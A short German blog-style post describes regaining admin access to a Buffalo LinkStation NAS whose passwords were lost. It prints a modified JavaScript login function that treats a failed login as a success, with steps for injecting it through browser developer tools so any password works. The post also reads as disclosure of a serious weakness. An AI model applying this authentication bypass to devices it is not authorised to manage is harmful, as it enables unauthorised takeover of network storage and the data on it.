Buffalo Link Station - Kennwort vergessen?

Wir haben hier eine kleine Buffalo Link Station stehen. Leider hat mein Vorgänger die Kennwörter mitgenommen. Das heißt, ich kann mich nicht mehr anmelden und die Link Station verwalten. Ich komme zwar noch an die gespeicherten Daten ran, die in den freigegebenen Verzeichnissen liegen, aber das war's. Blöde Ideen als Lösung gibt es viele, aber was ich dann fand, hat uns  in der IT herzlich lachen lassen.

  1. Öffnen Sie die Weboberfläche der Buffalo Link Station
  2. Öffnen Sie im Browser dessen Enwticklertools
  3. Suchen sie die Datei "login_utis.js aus dem Ordner "Authentication"
  4. Ersetzen Sie die Original-Loginfunktion mit folgendem Code:

    Code:

    function login(f, lang) {
       if (login_lock != 0) {
          return;
       }
       login_lock = 1;

       var uid = Ext.getCmp('user');
       var uid_value = uid.getValue();
       var pwd = Ext.getCmp('password');
       var pwd_value = pwd.getValue();

       f.form.submit({
          url: '/dynamic.pl',
          params: {
             bufaction: 'verifyLogin'
          },
          waitTitle: S('Please Wait...'),
          waitMsg: S('Logging In...'),
          success: function(form, action){
             var decodedResponse= Ext.decode(action.response.responseText);
             var jsonData = decodedResponse.data;
             loginSuccess(f, action, uid_value, lang);
          },
          failure: function(form, action){
             loginSuccess(f, action, uid_value, lang);
          }
       });
    };

  5. Drücken sie die Tastenkombination STRG+S zum Speichern der Änderungen
  6. Nach dem Speichern NICHT F5 drücken, die Seite sonstwie aktualisieren oder verlassen und zurück kehren. Dann sind die Änderungen verloren und zurück gesetzt.
  7. Jetzt können Sie sich als Administrator mit einem beliebigen Kennwort anmelden - z. B. User = admin; Kennwort = admin
  8. Nach erfolgreicher Anmeldung kann über REESTORE das Kennwort wieder auf den Ursprung zurück gesetzt werden.

Der Witz war, dass es ohne Probleme auf Anhieb funktioniert hat. Wir haben uns erst mal ungläubig angeschaut. Bin ich wirklich schon drin? Ja! Und ich hatte auf alles Zugriff. Wo ist jetzt bitte ein Fünkchen Sicherheit bei den Buffalo Link Stations?

0 Kommentare